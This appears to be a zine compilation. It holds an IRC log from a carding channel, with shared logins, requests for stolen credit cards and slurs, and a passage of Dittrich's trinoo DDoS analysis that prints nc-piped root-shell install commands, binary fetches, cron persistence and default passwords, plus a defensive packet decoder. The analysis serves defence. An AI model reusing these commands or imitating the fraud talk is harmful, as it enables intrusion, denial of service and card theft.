      :DuXo! ::)
      :dlotos33! :Enyone is from ROMANIA?
      :DuXo! :
      :DuXo! :
      :DuXo! :go 
      :DuXo! :see some girls
      :DuXo! :www.playboy.com
      :DuXo! :username : duxoboy16
      :Bl4ck__! :lolz
      :DuXo! :pass : dukovski16]
      :DuXo! :pass : dukovski16
      :DuXo! :pass : dukovski16
      :DuXo! :don`t see the fucking pc all the day
      :Co0lWoRx! :no man
      :Co0lWoRx! :w8
      :Co0lWoRx! :w8
      :Bl4ck__! :looolz
      :Bl4ck__! :www.schoolgirls.com
      :DuXo! :http://cyber.playboy.com/members
      :DuXo! :http://cyber.playboy.com/members
      :DuXo! :hm.
      :DuXo! :that`s good too..
      :DuXo! :i have account on that
      :DuXo! :but i don`t know the fucking pass
      :Bl4ck__! :username : dementul@qubemail.com
      :DuXo! :;)))
      :Bl4ck__! :pass cromo34
      :Bl4ck__! ::>>
      :DuXo! :come on 
      :DuXo! :go shake ur dicks:)))))
      :Co0lWoRx! :lol
      :_Mephisto! ::P
      :DuXo! :put ur dick in the Cd-rom :)) because u can`t put it in pussy :))))))
      :yourlife! :?
      :DuXo! :what ???
      :yourlife! ::)
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :TanTouze! :I was sexually assaulted by Bill Clinton
      :DuXo! :anyone here wants to be my drop?
      :Sp07! :sup
      :Sp07! :im done with high school
      :Sp07! :ahahhhhhhhhhhhhhhhhhhhhhhhhhahahaa
      :Sp07! :
      :Sp07! :@#$
      :Sp07! :
      :Sp07! :
      :DuXo! :bye to all
      :_Mephisto! :bya
      :_Mephisto! :bye
      :Tzaranul! :aaa
      :Tzaranul! :re
      :Tzaranul! ::)
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :Nightw|sH! :re Bl4ck
      :SPANkY_! :anyone here trade msg me
      :trinix! :sup all?
      :trinix! :any one want to send some ccs over my way?
      :trinix! :any one want to send some ccs over my way?
      :SPANkY_! :anyone here trade msg me
      :D1ck! :ins
      :D1ck! :J4n3 
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :dmonchild! :ACTION i am selling hardware if your intrested please /msg me for prices
      :Cyb3rL0rd! :re ppl
      :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ?
      :hackmon! :bye
      :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ?
      :Fr0d! :any1 op/voice wanna trade
      :m4r1n4ru! :-op
      :Co0lWoRx! :hello
      :Fr0d`! :hey
      :Fr0d`! :sup manm
      :Bl4ck_! :Chel00 heya
      :m4r1n4ru! :ajajajajaj
      :Co0lWoRx! :lol
      :Co0lWoRx! :hey negro, do u ever wonder why Chel00 never talks?
      :Bl4ck_! :coz is an emech
      :Bl4ck_! :Chel00 say hi Co0lWoRx
      :Bl4ck_! ::>
      :Chel00! :hi Co0lWoRx
      :Bl4ck_! ::PP
      :Co0lWoRx! :lol
      :Co0lWoRx! :ok
      :_KAoS_! :anyone in that wants to trade?
      :Fr0d! :msg me
      :Co0lWoRx! :bbl
      :TanTouze! :sell me something.... anything. QUICK
      :Bl4ck_! :ACTION is away -[ bbl ]- at 04:48a -[ P:On / L:On ]-
      :Bl4ck_! :ACTION is back -[ bbl ]- gone 1 min 49 s
      :m4r1n4ru! :-op
      :m4r1n4ru! :-op
      :connex! :i need a cc to buy a shell...anybody can help me?
      :[Mighty]! :trade CC ? 
      :Fr0d! :msg me
      :connex! :yes or visa(master)
      :Tzaranul! :re
      :Tzaranul! ::)
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :i need a cc to buy a shell...anybody can help me?
      :_Mephisto! :where do you buy the shell???
      :Bl4ck_! :www.turbulent.net
      :Bl4ck_! :www.turboshell.com
      :Bl4ck_! :www.shellyeah.org
      :Bl4ck_! :www.bestshell.com
      :_Mephisto! :thx
      :Bl4ck_! ::>
      :[sm0ke]! :is turbulent.net cardable?
      :m4r1n4ru! :nope
      :m4r1n4ru! :ajajajaaja
      :[sm0ke]! :hehe. i knew it. .
      :[sm0ke]! :u have to mail da freakin receipt. .. to have it activated. .
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :pls help me
      :_Mephisto! :bye
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :pls help me
      :[sm0ke]! :buy a shell? where?
      :connex! :[sm0ke] help me
      :connex! :[sm0ke] help me i want to buy a shell
      :TheRason! :hello anybody
      :TheRason! :i need a cc to buy a web domain 
      :[sm0ke]! :
      :card-it! :trading lists, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :no traders in here?
      :Bl4ck_! :ACTION is away -[ Starcraft si astea si alea ]- at 06:26a -[ P:On / L:On ]-
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :|Makaveli! :how can we get the +v???
      :|Makaveli! :or an op
      :gatorade^! :ACTION is trading ccz msg me
      :J4n3! :D1ck  ?
      :D1ck! :yep
      :D1ck! :y0
      :D1ck! :i am from my dad's laptiop
      :D1ck! :sun
      :D1ck! :i need a webpage
      :D1ck! :for the box
      :J4n3! :webpage ?
      :D1ck! :deal finialised
      :D1ck! :and u know how can i accept credit card online?
      :J4n3! :yeah u can but fruad bauth hoga, but
      :D1ck! :?
      :J4n3! :if u set the rule that fax or email the scanned copy of credit card phir sahi hai
      :D1ck! :we have to pay for fraud or its their responsibility/
      :D1ck! :oh
      :D1ck! :kool
      :J4n3! :yeah :)
      :D1ck! ::)
      :D1ck! :can u start the page
      :D1ck! :?
      :J4n3! :server ka kyia huwa ?
      :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices
      :J4n3! :what's the compnay name ? i mean site name ?
      :J4n3! :?
      :D1ck! :got d/c
      :J4n3! :wb
      :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices
      :D1ck! :thx
      :J4n3! :what's the compnay name ? i mean site name ?
      :D1ck! :company's name is  'Big Stuff'
      :D1ck! :or u have any beter name?
      :D1ck! :i want a site some thing like www.unixrules.net
      :D1ck! :i`ll tell u the prices
      :J4n3! :hmm
      :J4n3! :unixrules is booked i think
      :D1ck! :no no
      :D1ck! :i am ssaying
      :D1ck! :look at their page
      :D1ck! :it rox
      :J4n3! :oh u mean designing ?
      :D1ck! :yeps
      :D1ck! :hehe
      :D1ck! :'Big Stuff' 
      :D1ck! :The Ultimate Web Solution.
      :J4n3! :hmm
      :D1ck! :till when will be the website complete?
      :J4n3! :wait lemme take a look
      :D1ck! :oki
      :J4n3! :hmm yeah saw it
      :D1ck! :kewl
      :D1ck! :what prices should we do?
      :J4n3! :no idea i think it should start from 9 to 10 $ for shell
      :J4n3! :3 to 4 for bnc
      :D1ck! :oki
      :J4n3! :webhosting i'll ask j0e
      :D1ck! :okies
      :J4n3! :oye what bout server ??
      :D1ck! :  4 background processes (eggdrop, screen, irc) 
      :J4n3! :got this box its fast 24.66.83.137.mb.wave.home.com
      :D1ck! :  2 login names 
      :D1ck! :  20 MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  3 months [$30] - 6 months [$60] - 12 months [$120]
      :D1ck! :  Credit Card Customers, Sign up here
      :D1ck! :  Sign up Now
      :J4n3! :but no linux root kit :(
      :D1ck! :server?
      :D1ck! :heheh
      :J4n3! :i mean have u finalized? 
      :D1ck! :my computer is not working
      :D1ck! :thats why i am in this
      :D1ck! :yep
      :J4n3! :oh
      :D1ck! :finisalised
      :J4n3! :going to pay for it ?
      :D1ck! :yep
      :J4n3! :anuallay ?? how much ?
      :D1ck! :welp
      :D1ck! :200/month
      :D1ck! :and rent is 25 
      :D1ck! :225
      :J4n3! :oh kewl
      :J4n3! :ip's ?
      :J4n3! :how much ip's ?
      :D1ck! :256
      :D1ck! ::")
      :J4n3! :great :)
      :D1ck! :hehe
      :D1ck! :wait i`ll send u .txt for shells
      :D1ck! :one sec
      :J4n3! :k
      :J4n3! ::)
      :D1ck! ::)
      :J4n3! :Caldera OpenLinux(TM)
      :J4n3! :Version 2.2
      :J4n3! :Copyright 1996-1999 Caldera Systems, Inc.
      :D1ck! :oye accept this
      :J4n3! :send send
      :J4n3! :bin/login: error in loading shared libraries: libcrypt.so.1: cannot open shared object file: No such file or directory
      :D1ck! :make it attractive and stuff
      :J4n3! : DCC Unable to create connection: Connection refused
      :D1ck! :err
      :D1ck! :copy paste this
      :D1ck! :SPECIAL PACKAGE
      :D1ck! :  
      :D1ck! :  4 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  25 MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  
      :D1ck! :  1 month [$20] 3 months [$40] - 6 months [$60] - 12 months [$120]
      :D1ck! :SILVER SHELL ACCOUNT 
      :D1ck! :  2 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  10MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  1 month [$10] 3 months [$30] - 6 months [$55] - 12 months [$100] 
      :D1ck! : 
      :D1ck! :GOLD SHELL  
      :D1ck! :  4 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  2 login names 
      :D1ck! :  FREE Personal vhost   (username@can.choose.from.many.domains)
      :D1ck! :  100 MB total disk space 
      :D1ck! :  FTP and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  3 months [$60] - 6 months [$110] - 12 months [$200] 
      :D1ck! :make the rupeese too pls
      :D1ck! ::P
      :J4n3! :hah u forgot to write the BitchX ?
      :D1ck! :oh yes
      :D1ck! :irc==BitchX
      :J4n3! :eggdrop, screen, irc, energymechs, BitchX
      :D1ck! :yep yep
      :D1ck! :add it
      :D1ck! ::P
      :J4n3! :ok
      :J4n3! :kkz wait lemme copy it
      :D1ck! :oye thats stolen from unixrules
      :D1ck! :so change it a bit
      :D1ck! :jhehe
      :D1ck! :hehe
      :J4n3! :ok done :)
      :J4n3! :yeah don worry prices r same ?
      :J4n3! :or u modified it ?
      :D1ck! :modified
      :D1ck! :and mb space too
      :J4n3! :kkz
      :J4n3! :Celebrium ?
      :D1ck! :yep
      :D1ck! :ok now webpage
      :D1ck! :BASIC WEBHOSTING  
      :D1ck! :  100MB disk space 
      :D1ck! :  1 Mailbox (POP3/SMTP) 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  500 MB of data transfer per month 
      :D1ck! :  3 months [$30] - 6 months [$55] - 12 months [$100] 
      :D1ck! :PRIME WEBHOSTING  
      :D1ck! :  200 MB disk space 
      :D1ck! :  5 Mailboxes (POP3/SMTP) 
      :D1ck! :  FREE Domain Name Registration (internic fee applies) 
      :D1ck! :  Unlimited email address forwarding 
      :D1ck! :  Custom CGI script directory 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  1500 MB of data transfer per month 
      :D1ck! :  3 months [$60] - 6 months [$110] - 12 months [$200]
      :D1ck! :PRO WEBHOSTING  
      :D1ck! :  350 MB disk space 
      :D1ck! :  25 Mailboxes (POP3/SMTP) 
      :D1ck! :  Unlimited email address forwarding 
      :D1ck! :  Custom CGI script directory 
      :D1ck! :  PHP3 access 
      :D1ck! :  Frontpage Extension access 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  5000 MB of data transfer per month 
      :D1ck! :  3 months [$150] - 6 months [$275] - 12 months [$500]
      :D1ck! :modify style and idhar udhar so it doesnt look as we stole it
      :D1ck! :hehe
      :J4n3! :hah is say kuch nahi hotha waisy bee almost sub shells kay milthay julthay hain
      :D1ck! :EMAIL HOSTING  
      :D1ck! :   FREE Domain Name Registration (Internic Fee applies) 
      :D1ck! :   username@your-company.com 
      :D1ck! :   5 Mailboxes (POP3) 
      :D1ck! :   25 Emails Forwarding 
      :D1ck! :  3 months [$30] - 6 months [$50] - 12 months [$75] 
      :D1ck! :lol
      :D1ck! :yup
      :D1ck! ::P
      :D1ck! :oye when will it be complete
      :D1ck! :asnd i am signing up legal domain
      :D1ck! :where should i?
      :D1ck! :cheapest
      :D1ck! :?
      :J4n3! :hmmm
      :D1ck! :mater may we are OC3 :P
      :J4n3! :dotster.com
      :D1ck! :OC3 lines
      :D1ck! :ok
      :J4n3! :yeah from where u getting this server ? and till when u get it ?
      :J4n3! :it should be on redhat ok ?
      :D1ck! :easilyhosted
      :D1ck! :yep
      :D1ck! :it is
      :D1ck! :i`ll make it ultra secure
      :D1ck! :redhat 6.2
      :J4n3! :haha kewl 
      :D1ck! :i`ll upgrade to new kernel
      :J4n3! :give me 2 days for web
      :D1ck! :2.2.16
      :D1ck! :kewl
      :D1ck! :okies
      :J4n3! ::)
      :D1ck! :the day u do it
      :D1ck! :the next day ill get the seerver
      :D1ck! :online
      :J4n3! :hmmm
      :J4n3! :talked to ur dad bout it ?
      :D1ck! :ofcourse
      :D1ck! :he sed 'yes'
      :D1ck! :and i have his cc in my hand
      :D1ck! ::P
      :J4n3! :haha cool
      :J4n3! :woooo
      :J4n3! ::p
      :D1ck! ::/
      :J4n3! :lekin signup kahan say kiya ?? konsee company say ? 
      :J4n3! :t3 ?
      :J4n3! :or oc3 ?
      :D1ck! :well
      :D1ck! :more then Tota1KaaS1
      :D1ck! :t1
      :D1ck! :but
      :D1ck! :technically OC3
      :D1ck! :ll providers who sya they are oc3 are lieing, yes technicqally they
      :D1ck! :are
      :J4n3! :ahaan
      :D1ck! :but its shared bandwith
      :D1ck! :mine will be 990k/sec
      :J4n3! :w00ps
      :D1ck! :to 2 mb
      :D1ck! :and 40 gigs of transfer
      :J4n3! :shells will rock on this server
      :D1ck! :yep
      :D1ck! ::)
      :D1ck! :and i`ve heard routers are firewalled
      :D1ck! :so thats a good enws
      :J4n3! :great already signed up , or going to ?
      :D1ck! :oye pls get started on the page if u are not too bz
      :D1ck! ::P
      :D1ck! :i will send the payment
      :J4n3! :yeah i will from today
      :D1ck! :no cc
      :D1ck! :and today i`ll buy a merchant account
      :J4n3! :oh ohkay :)
      :D1ck! ::)
      :J4n3! :u have too many ips
      :D1ck! :yep
      :J4n3! :we can buy more domains illlegaly to like j0e but
      :D1ck! :that rox
      :D1ck! :well
      :D1ck! :i can get caught
      :J4n3! :first we need the dns of ur server so we can give it when registering the domain
      :D1ck! ::p
      :J4n3! :like ns1 and ns2
      :J4n3! :they need it for registeration
      :D1ck! :oh
      :D1ck! :i am half way through the registration
      :D1ck! :hehe
      :D1ck! :so i cant modify it later?
      :J4n3! :yeah :)
      :D1ck! :kewl
      :D1ck! :almost complete
      :J4n3! ::))))))
      :D1ck! :hehe
      :D1ck! :a graphix of Big Tecnologies would rock
      :J4n3! :sure it would , just see
      :D1ck! ::/
      :D1ck! :oki
      :J4n3! ::9:0:)
      :D1ck! ::)
      :J4n3! :how do i open a telnet on a box ?? from inetd.conf ? when it say connection refused on 23 , its not on hosts.allow
      :D1ck! :err they need name serfver
      :D1ck! :hehe
      :D1ck! :cat /etc/inetd.conf | grep telnet
      :D1ck! :and paste me here
      :J4n3! :yeah wait
      :J4n3! :hahah yeah
      :J4n3! :its close from there
      :J4n3! :the box is kewl i want to run psy from there
      :J4n3! :ip is admin.cgocable.net
      :J4n3! :wait lemme opne it
      :D1ck! :hehhe
      
      Day 14 June 17
      
      
      
      
      
      
      
307.0 [IND] Trinoo DDoS Analysis
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      ==========================================================================
      
        The DoS Project's "trinoo" distributed denial of service attack tool
      
      ==========================================================================
      
      David Dittrich <dittrich@cac.washington.edu>
      University of Washington
      Copyright 1999. All rights reserved.
      October 21, 1999
      
      
      Introduction
      ------------
      
      The following is an analysis of the DoS Project's "trinoo" (a.k.a.
      "trin00") master/slave programs, which implement a distributed
      network denial of service tool.
      
      Trinoo daemons were originally found in binary form on a number of
      Solaris 2.x systems, which were identified as having been compromised
      by exploitation of buffer overrun bugs in the RPC services "statd",
      "cmsd" and "ttdbserverd".  These attacks are described in CERT
      Incident Note 99-04:
      
              http://www.cert.org/incident_notes/IN-99-04.html
      
      The trinoo daemons were originally believed to be UDP based,
      access-restricted remote command shells, possibly used in conjunction
      with sniffers to automate recovering sniffer logs.
      
      During investigation of these intrusions, the installation of a trinoo
      network was caught in the act and the trinoo source code was obtained
      from the account used to cache the intruders' tools and log files.
      This analysis was done using this recovered source code.
      
      Modification of the source code would change any of the details
      in this analysis, such as prompts, passwords, commands, TCP/UDP port
      numbers, or supported attack methods, signatures, and features.
      
      The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0
      systems.  The master was compiled and run on Red Hat Linux 6.0.  It is
      believed that both master and daemon have been witnessed "in the
      wild" on these same platforms.
      
      Trinoo networks are probably being set up on hundreds, perhaps
      thousands, of systems on the Internet that are being compromised by
      remote buffer overrun exploitation.  Access to these systems is
      probably being perpetuated by the installation of multiple "back
      doors" along with the trinoo daemons.
      
      A trinoo network of at least 227 systems -- 114 of these at Internet2
      sites -- was used on August 17, 1999 to flood a single system at the
      University of Minnesota, swamping the target network and rendering it
      unusable for over two days.  While responding to this attack, large
      flows were also noticed going to at least sixteen other systems, some
      outside the US.  (See Appendix D for a report of part of this trinoo
      attack.) 
      
      
      Attack scenario
      ---------------
      
      A typical installation might go something like this.
      
      1).  A stolen account is set up as a repository for pre-compiled
      versions of scanning tools, attack (i.e. buffer overrun exploit)
      tools, root kits and sniffers, trinoo daemon and master programs,
      lists of vulnerable hosts and previously compromised hosts, etc.  This
      would normally be a large system with many users, one with little
      administrative oversight, and on a high-bandwidth connection for rapid
      file transfer.
      
      2).  A scan is performed of large ranges of network blocks to identify
      potential targets.  Targets would include systems running various
      services known to have remotely exploitable buffer overflow security
      bugs, such as wu-ftpd, RPC services for "cmsd", "statd",
      "ttdbserverd", "amd", etc.  Operating systems being targeted appear to
      be primarily Sun Solaris 2.x and Linux (due to the ready availability
      of network sniffers and "root kits" for concealing back doors, etc.),
      but stolen accounts on any architecture can be used for caching tools
      and log files.
      
      3).  A list of vulnerable systems is then used to create a script that
      performs the exploit, sets up a command shell running under the root
      account that listens on a TCP port (commonly 1524/tcp, the
      "ingreslock" service port), and connects to this port to confirm the
      success of the exploit.  In some cases, an electronic mail message is
      sent to an account at a free web based email service to confirm which
      systems have been compromised.
      
      The result is a list of "owned" systems ready for setting up
      back doors, sniffers, or the trinoo daemons or masters.
      
      4). From this list of compromised systems, subsets with the desired
      architecture are chosen for the trinoo network.  Pre-compiled binaries
      of the trinoo daemon are created and stored on a stolen account
      somewhere on the Internet.
      
      5). A script is then run which takes this list of "owned" systems and
      produces yet another script to automate the installation process,
      running each installation in the background for maximum multitasking.
      
      This script uses "netcat" ("nc") to pipe a shell script to the root
      shell listening on, in this case, port 1524/tcp:
      
      ---------------------------------------------------------------------------
      ./trin.sh | nc 128.aaa.167.217 1524 &
      ./trin.sh | nc 128.aaa.167.218 1524 &
      ./trin.sh | nc 128.aaa.167.219 1524 &
      ./trin.sh | nc 128.aaa.187.38 1524 &
      ./trin.sh | nc 128.bbb.2.80 1524 &
      ./trin.sh | nc 128.bbb.2.81 1524 &
      ./trin.sh | nc 128.bbb.2.238 1524 &
      ./trin.sh | nc 128.ccc.12.22 1524 &
      ./trin.sh | nc 128.ccc.12.50 1524 &
       . . .
      ---------------------------------------------------------------------------
      
      The script "trin.sh", whose output is being piped to these systems,
      looks like:
      
      ---------------------------------------------------------------------------
      echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
      echo "echo rcp is done moving binary"
      
      echo "chmod +x /usr/sbin/rpc.listen"
      
      echo "echo launching trinoo"
      echo "/usr/sbin/rpc.listen"
      
      echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
      echo "crontab cron"
      echo "echo launched"
      echo "exit"
      ---------------------------------------------------------------------------
      
      Depending on how closely crontab files are monitored, or if they are
      used at all, this may be detected easily.  If cron is not used at all
      by this user (usually root), it may not be detected at all.
      
      Another method was witnessed on at least one other system, where the
      daemon was named "xterm", and was started using a script (named "c" on
      the system on which it was found) that contains:
      
      ---------------------------------------------------------------------------
      cd /var/adm/.1
      PATH=.:$PATH
      export PATH
      xterm 1>/dev/null 2>&1
      ---------------------------------------------------------------------------
      
      This would supposedly imply a method of running this script on demand
      to set up the trinoo network.
      
      Even more subtle ways of having trinoo daemons/masters lie in wait for
      execution at a given time are easy to envision (e.g., UDP or ICMP
      based client/server shells, such as LOKI (see Appendix C), programs
      that wake up periodically and open a listening TCP or UDP port, etc.)
      
      The result of this automation is the ability for attackers to set up
      the denial of service network, on widely dispersed systems whose true
      owners don't even know are out of their control, in a very short time
      frame.
      
      6).  Optionally, a "root kit" is installed on the system to hide the
      presence of programs, files, and network connections.   This is more
      important on the master system, since these systems are key to the
      trinoo network. (It should be noted that in many cases, masters have
      been set up on Internet Service Providers' primary name server hosts,
      which would normally have extremely high packet traffic and large
      numbers of TCP and UDP connections, which would effectively hide any
      trinoo related traffic or activity, and would likely not be detected.)
      (The fact that these are primary name servers would also tend to make
      the owners less likely to take the system off the Internet when
      reports begin to come in about suspected denial of service related
      activity.)
      
      Root kits would also be used on systems running sniffers that, along
      with programs like "hunt" (TCP/IP session hijacking tool) are used to
      burrow further into other networks directly, rather than through
      remote buffer overrun exploits (e.g., to find sites to set up new file
      repositories, etc.)
      
      For more on "root kits" and some ways to get around them, see:
      
              http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq
      
      
      The network: attacker(s)-->master(s)-->daemon(s)-->victim(s)
      ------------------------------------------------------------
      
      The trinoo network is made up of a master server ("master.c") and the
      trinoo daemon ("ns.c").  A trinoo network would look like this:
      
      
                        +----------+           +----------+
                        | attacker |           | attacker |
                        +----------+           +----------+
                             |                      |
              . . . --+------+---------------+------+----------------+-- . . .
                      |                      |                       |
                      |                      |                       |
                 +----------+           +----------+            +----------+
                 |  master  |           |  master  |            |  master  |
                 +----------+           +----------+            +----------+
                      |                      |                       |
                      |                      |                       |
      . . . ---+------+-----+------------+---+--------+------------+-+-- . . .
               |            |            |            |            |
               |            |            |            |            |
           +--------+   +--------+   +--------+   +--------+   +--------+
           | daemon |   | daemon |   | daemon |   | daemon |   | daemon |
           +--------+   +--------+   +--------+   +--------+   +--------+
      
      
      The attacker(s) control one or more "master" servers, each of which
      can control many "daemons" (known in the code as "Bcast", or
      "broadcast" hosts.)  The daemons are all instructed to coordinate a
      packet based attack against one or more victim systems.
      
      All that is then needed is the ability to establish a TCP connection
      to the master hosts using "telnet" and the password to the master
      server to be able to wage massive, coordinated, denial of service
      attacks.
      
      
      Communication ports
      -------------------
      
          Attacker to Master(s):      27665/tcp
          Master to daemon(s):        27444/udp
          Daemon to Master(s):        31335/udp
      
      Remote control of the trinoo master is accomplished via a TCP
      connection to port 27665/tcp.  After connecting, the user must give
      the proper password ("betaalmostdone").  If another connection is made
      to the server while someone is already authenticated, a warning is
      sent to them with the IP address of the connecting host (it appears
      there is a bug that reports incorrect IP addresses, but a warning is
      still communicated).  This will no doubt be fixed eventually and will
      then give the attackers time to clean up and cover their tracks.
      
      Communication from the trinoo master to daemons is via UDP packets
      on port 27444/udp.  Command lines are space separated lines of the
      form:
      
              arg1 password arg2
      
      The default password for commands is "l44adsl", and only command lines
      that contain the substring "l44" are processed.
      
      Communication from the trinoo daemons to the master is via UDP
      packets on port 31335/udp.
      
      When the daemon starts, it initially sends "*HELLO*" to the master,
      which maintains a list of active daemons that it controls (packet
      captured using "sniffit"):
      
      UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335
       45 E 00 . 00 . 23 # B1 . 5D ] 40 @ 00 . F8 . 11 . B9 . 27 . C0 . A8 . 00 . 01 .
       0A . 00 . 00 . 01 . 80 . 6C l 7A z 67 g 00 . 0F . 06 . D4 . 2A * 48 H 45 E 4C L
       4C L 4F O 2A *
      
      If the trinoo master sends a "png" command to a daemon on port
      27444/udp, the daemon will reply to the server that just sent the "png"
      command by sending the string "PONG" on port 31335/udp:
      
      UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
       45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 .
       C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20  
       6C l 34 4 34 4 61 a 64 d 73 s 6C l
      
      UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335
       45 E 00 . 00 . 20   13 . 81 . 40 @ 00 . F8 . 11 . 57 W 07 . C0 . A8 . 00 . 01 .
       0A . 00 . 00 . 01 . 80 . 6F o 7A z 67 g 00 . 0C . 4E N 24 $ 50 P 4F O 4E N 47 G
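
      The three captures above can be decoded mechanically. The following is
      an added example (not part of the original paper): it rebuilds the raw
      bytes from sniffit's hex/ASCII layout, parses the IPv4 and UDP headers,
      and labels the payload using the default ports and strings listed in
      this section. The function names and labels are this example's own.

```python
import re
import struct
from ipaddress import IPv4Address

# Default ports and strings as documented in the analysis; a modified build
# may change any of them, so treat a match as a lead, not as proof.
MASTER_TO_DAEMON = 27444   # udp: "arg1 password arg2" command lines
DAEMON_TO_MASTER = 31335   # udp: "*HELLO*" and "PONG"
DAEMON_COMMANDS = {"aaa", "bbb", "shi", "png", "d1e", "rsz", "xyz"}

# The three sniffit captures printed in the text, copied verbatim.
HELLO_DUMP = """
 45 E 00 . 00 . 23 # B1 . 5D ] 40 @ 00 . F8 . 11 . B9 . 27 . C0 . A8 . 00 . 01 .
 0A . 00 . 00 . 01 . 80 . 6C l 7A z 67 g 00 . 0F . 06 . D4 . 2A * 48 H 45 E 4C L
 4C L 4F O 2A *
"""
PNG_DUMP = """
 45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 .
 C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20
 6C l 34 4 34 4 61 a 64 d 73 s 6C l
"""
PONG_DUMP = """
 45 E 00 . 00 . 20   13 . 81 . 40 @ 00 . F8 . 11 . 57 W 07 . C0 . A8 . 00 . 01 .
 0A . 00 . 00 . 01 . 80 . 6F o 7A z 67 g 00 . 0C . 4E N 24 $ 50 P 4F O 4E N 47 G
"""

HEX_BYTE = re.compile(r"[0-9A-Fa-f]{2}")


def sniffit_to_bytes(dump):
    """Rebuild raw bytes from sniffit's 'HH c HH c ...' layout.

    Every byte is printed as two hex digits followed by one ASCII character.
    A space byte (0x20) is followed by a literal blank, so the ASCII column
    cannot be paired up reliably; only the two-character hex tokens are kept.
    """
    return bytes(int(tok, 16) for tok in dump.split() if HEX_BYTE.fullmatch(tok))


def decode_udp(packet):
    """Parse an IPv4/UDP packet; return None if it is truncated or not UDP."""
    if len(packet) < 28 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    (total_len,) = struct.unpack("!H", packet[2:4])
    if ihl < 20 or packet[9] != 17:
        return None
    if total_len > len(packet) or total_len < ihl + 8:
        return None
    sport, dport, udp_len = struct.unpack("!HHH", packet[ihl:ihl + 6])
    if udp_len < 8 or ihl + udp_len > total_len:
        return None
    return {
        "src": str(IPv4Address(packet[12:16])),
        "dst": str(IPv4Address(packet[16:20])),
        "sport": sport,
        "dport": dport,
        "payload": packet[ihl + 8:ihl + udp_len],
    }


def classify(pkt):
    """Label trinoo control traffic; return None for anything else."""
    text = pkt["payload"].decode("latin-1")
    if pkt["dport"] == DAEMON_TO_MASTER:
        if text == "*HELLO*":
            return "daemon-registration"
        if text == "PONG":
            return "daemon-ping-reply"
    if pkt["dport"] == MASTER_TO_DAEMON:
        fields = text.split(" ")
        # The daemon only processes lines containing the substring "l44".
        if fields[0] in DAEMON_COMMANDS and "l44" in text:
            return "master-command:" + fields[0]
    return None


def analyse(dump):
    """Decode one sniffit capture and summarise it for an analyst."""
    pkt = decode_udp(sniffit_to_bytes(dump))
    if pkt is None:
        return None
    return {
        "flow": "%s:%d -> %s:%d" % (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"]),
        "payload": pkt["payload"].decode("latin-1"),
        "verdict": classify(pkt),
    }


if __name__ == "__main__":
    for capture in (HELLO_DUMP, PNG_DUMP, PONG_DUMP):
        print(analyse(capture))
```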
      
      
      Password protection
      -------------------
      
      Both the master and daemons are password protected to prevent
      system administrators (or other hacker groups) from being able to take
      control of the trinoo network.  These passwords are crypt() style
      passwords.  They are used in a symmetric fashion, where the encrypted
      password is compiled into the master and daemons and used to compare
      against the clear-text version of the password that is sent over the
      network (the current version does not encrypt the actual session, so the
      clear-text passwords are exposed in transit and the master control
      sessions are subject to TCP session hijacking).
      
      When initially run, the master daemon produces a prompt, waiting
      for a password.  If the proper password is not received, the program
      exits.  If the proper password is given, the process announces its
      execution, forks to continue running in the background, and exits:
      
          # ./master
          ?? wrongpassword
          # 
            . . .
      
          # ./master
          ?? gOrave
          trinoo v1.07d2+f3+c [Sep 26 1999:10:09:24]
          # 
      
      Likewise, when you connect to the remote command port (default
      27665/tcp), you must also give a password:
      
          attacker$ telnet 10.0.0.1 27665
